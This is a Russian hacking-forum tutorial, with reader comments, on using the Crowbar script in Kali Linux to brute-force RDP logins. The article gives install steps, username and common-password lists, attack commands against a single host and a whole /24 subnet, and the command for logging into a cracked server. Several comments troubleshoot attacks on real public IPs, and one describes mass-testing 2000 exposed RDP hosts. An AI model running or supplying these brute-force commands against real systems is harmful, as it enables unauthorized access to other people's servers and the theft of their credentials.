Статья Обзор скрипта для брутфорса Crowbar в KaliLinux


Я не знаю, потянет ли данная статья на участие в конкурсе, поэтому решение об её участии оставляю за администрацией форума .

Я не планировала писать эту статью.

Её написание пришло спонтанно и фактически явилось "побочным эффектом" от более тесного знакомства со скриптом для брутфорса "Patator".

Так уж сложились обстоятельства, что я не люблю заниматься хакингом на локальной машине. Для этих целей у меня всегда имеется виртуальный выделенный сервер. Обычно мои VDS управляются либо Windows, либо CentOS.

Вчера упрямый Patator не пожелал "прогнуться" под мои желания и Господин Случай сделал для меня маленькое открытие ))

В этом месте читателю в голову пришли мысли о том, что Илон Маск уже колонизировал Марс )

Нет, мои открытия намного скромнее. Оказалось, что для семейства Линукс написан очередной скрипт для осуществления атак "грубой силой" на Python.
Встречайте, Его Величество Crowbar.

Первоначально у меня было намерение установить скрипт на удалённую машину под управлением CentOS 7. Но меня ожидала неудача. Дело в том, что я планировала проверить работу скрипта по протоколу RDP и никакие компромиссы меня не устраивали. При работе по протоколу удалённого рабочего стола работа скрипта тесно связана с утилитой xfreerdp.

Я подключалась к VDS как обычно по протоколу SSH - в этом заключалась моя вероятная ошибка.

Для успешного контакта Crowbar+ XfreeRDP на удалённой машине необходимо было подключиться по VNC либо RDP.

Но внезапно нахлынувший ночной энтузиазм таял от минуты к минуте и было принято решение сдуть пыль с ярлыка "VMware Workstation Pro" на рабочем столе локальной машины.
На установку скачанного десять месяцев назад образа KaliLinux не ушло много времени.
По-быстрому произведены первичные настройки виртуального Kali и настал момент "танцев с бубном" вокруг Crowbar.
Код:
# apt-get update
Брут Crowbar - это скрипт на питоне , который вызывает системные программы с нужными параметрами . Для брута rdp вызывается xfreerdp клиент :
Код:
# apt-get install freerdp-x11

5wZmJIUzgplv39LItz6cvtk6tD2zlA.png

Проверка работоспособности xfreerdp
Код:
# xfreerdp --version
# xfreerdp --sec nla 185.154.13.84
Вышеуказанные команды вызывают адекватную реакцию, никаких ошибок в отличие от работы на удалённой CentOS 7 не выдали, значит можно продолжить.

Клонируем скрипт Crowbar при помощи git:
Код:
# git clone https://github.com/galkan/crowbar
Заходим в папку со скриптом:
Код:
# cd crowbar
Файлу надо добавить бит исполнимости (возможно, эта команда - лишняя, но я решила подстраховаться):
Код:
# chmod +x crowbar.py
Проверим работоспособность скрипта на этом этапе. Зададим ему команду выдать справку о себе.
Код:
# python crowbar.py --help

mJUdfPl5Ye3iCwj7yYwDL77r8CdDtS.png

Перед моим взором на экране монитора появилась страница справки по программе.
В этом месте возможно появление следующей ошибки:
No module named pkg_resources
Решение проблемы с ошибкой No module named pkg_resources
Код:
# yum -y update
# yum -y install python-pip
# pip install --upgrade pip
Или
Код:
# pip install --upgrade setuptools
# pip install --upgrade distribute
Опять пробуем запустить "Хелп"
Код:
# python crowbar.py --help
Работает ))

На этом - ВСЁ.
Всё коротко и лаконично )
Создаём текстовые файлы с предполагаемым списком логинов
Администратор
Administrator
admin
nimda
а также со списком предполагаемых паролей:
admin
root
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
12345678
abc123
Запуск скрипта питон в скрипте баш
Атаковать будем мой тестовый дедик IP 185.1хх.13.хх
Команда для атаки в моём случае должна иметь следующий вид:
Код:
# python crowbar.py -b rdp -U login.txt -C pass.txt  -s IP 185.1хх.13.хх/32 -o good.txt -n 100 -t 500 -v -d
Сканирование подсети 185.1хх.13.хх/24
Код:
# python crowbar.py -b rdp -U login.txt -C pass.txt  -s 185.1хх.13.хх/24 -o good.txt -n 100 -t 500 -v -d
Короткие пояснения :
-b rdp - Целевая служба. Crowbar поддерживает vnckey, openvpn, sshkey, rdp.
-n 100 - Количество задействованных потоков
-S: </path/to/file> список IP для брута
-d: Запустить nmap для того, чтобы узнать, является ли порт открытым или нет.
-v: Подробный режим, который показывает все попытки, включая неудачу.
-o good.txt -Все логи включая положительные результаты записываются в файл good.txt
После окончания атаки просматриваем файл good.txt и обнаруживает, что тестовый дедик успешно сбручен.
Подключаемся к его удалённому рабочему столу.
Код:
# xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 185.1хх.13.хх

bydpYk97dxhlDsJPp0cTsx00kDM33o.png

Успех )

В заключении статьи предлагаю к просмотру небольшой видеообзор скрипта


На этом у меня всё.
Всем - спасибо )
 
Последнее редактирование модератором:
A

Alien_Alien

python crowbar.py --help
File "crowbar.py", line 6
except Exception, err:
^
SyntaxError: invalid syntax

уменя выдал такую ошибку, при просмотре help,
 

karlomarx

One Level
03.05.2017
21
0
BIT
0
Что то он упорно не видит списки IP,в разных кодировках и форматах,ошибка не у меня одного,на гитхабе в проблемах написано
 
S

stas86

доброго времени суток, подскажите как исправить проблему: дедов находит а логин или пароль пишет не верный, как быть??
 

Вложения

  • Безымянный.jpg
    Безымянный.jpg
    30,3 КБ · Просмотры: 209
C

check

Привет. Помоги разобраться, не сканирует. Логи тоже не пишет. Установил все по порядку, ошибок не было.

root@kali:/crowbar# python crowbar.py -b rdp -U login.txt -C pass.txt -s 124.123.133.12/24 -o good.txt -n 100 -t 500 -v -d
2018-01-05 06:43:52 START
2018-01-05 06:43:52 Crowbar v0.3.5-dev
2018-01-05 06:43:52 Brute Force Type: rdp
2018-01-05 06:43:52 Output File: /crowbar/good.txt
2018-01-05 06:43:52 Log File: /crowbar/crowbar.log
2018-01-05 06:43:52 Discover Mode: True
2018-01-05 06:43:52 Verbose Mode: 1
2018-01-05 06:43:52 Debug Mode: False
2018-01-05 06:43:52 Discovery mode - port scanning: 124.123.133.12/24
2018-01-05 06:43:56 STOP
2018-01-05 06:43:56 No results found...
root@kali:/crowbar# ls
crowbar-blackhat-arsenal.md crowbar.py good.txt images lib LICENSE.txt login.txt pass.txt README.md
root@kali:/crowbar#


это изза параметра -d не дружит чего то с nmap
 
U

USD

Прочекал 2000 валидных айпи с открытым портом 3389 по такой команде: python crowbar.py -b rdp -u administrator -c 123456 -S '/root/ip.txt' -o good.txt -v. Получил 300 гудов. Но ниче не подходит((
 

dfpolis

One Level
15.12.2017
2
4
BIT
0
root@kali:~/crowbar# python crowbar.py -b rdp -U login.txt -C pass.txt -s IP 64.214.109.131/32 -o good.txt -n 100 -t 500 -v -d
2018-05-02 01:37:40 START
2018-05-02 01:37:40 Crowbar v0.3.5-dev
2018-05-02 01:37:40 Brute Force Type: rdp
2018-05-02 01:37:40 Output File: /root/crowbar/good.txt
2018-05-02 01:37:40 Log File: /root/crowbar/crowbar.log
2018-05-02 01:37:40 Discover Mode: True
2018-05-02 01:37:40 Verbose Mode: 1
2018-05-02 01:37:40 Debug Mode: False
2018-05-02 01:37:40 Discovery mode - port scanning: IP
Failed to resolve "IP".
WARNING: No targets were specified, so 0 hosts scanned.
2018-05-02 01:37:41 STOP
2018-05-02 01:37:41 No results found...

Вводил так. Возможно что то не так или скрипт так и не допилили?
 
E

em1k

root@kali:~/crowbar# python crowbar.py -b rdp -U login.txt -C pass.txt -s IP 64.214.109.131/32 -o good.txt -n 100 -t 500 -v -d
2018-05-02 01:37:40 START
2018-05-02 01:37:40 Crowbar v0.3.5-dev
2018-05-02 01:37:40 Brute Force Type: rdp
2018-05-02 01:37:40 Output File: /root/crowbar/good.txt
2018-05-02 01:37:40 Log File: /root/crowbar/crowbar.log
2018-05-02 01:37:40 Discover Mode: True
2018-05-02 01:37:40 Verbose Mode: 1
2018-05-02 01:37:40 Debug Mode: False
2018-05-02 01:37:40 Discovery mode - port scanning: IP
Failed to resolve "IP".
WARNING: No targets were specified, so 0 hosts scanned.
2018-05-02 01:37:41 STOP
2018-05-02 01:37:41 No results found...

Вводил так. Возможно что то не так или скрипт так и не допилили?
Та же проблема
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
В "Crowbar" есть проблемка, по крайней мере я с ней столкнулся. Указывая файл со списком хостов, например " -S /root/директория/хосты.тхт", "Crowbar" не видет этот файл... данные в файле заполнены так:
54.213.250.103
54.201.138.203
54.238.159.255
54.219.160.225
54.218.251.249
...много много строчек....

Но если например указывать хосты например так "-s 54.238.159.0/24" то всё работает.
В чём проблема? Быть может я в файле не в том формате указал ip?
 

Maximkon89

New member
01.04.2020
1
0
BIT
2
root@kali:~/crowbar# python crowbar.py -b rdp -U login.txt -C pass.txt -s IP 64.214.109.131/32 -o good.txt -n 100 -t 500 -v -d
2018-05-02 01:37:40 START
2018-05-02 01:37:40 Crowbar v0.3.5-dev
2018-05-02 01:37:40 Brute Force Type: rdp
2018-05-02 01:37:40 Output File: /root/crowbar/good.txt
2018-05-02 01:37:40 Log File: /root/crowbar/crowbar.log
2018-05-02 01:37:40 Discover Mode: True
2018-05-02 01:37:40 Verbose Mode: 1
2018-05-02 01:37:40 Debug Mode: False
2018-05-02 01:37:40 Discovery mode - port scanning: IP
Failed to resolve "IP".
WARNING: No targets were specified, so 0 hosts scanned.
2018-05-02 01:37:41 STOP
2018-05-02 01:37:41 No results found...

Вводил так. Возможно что то не так или скрипт так и не допилили?
Убери "IP" перед айпишником и все заработает!
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!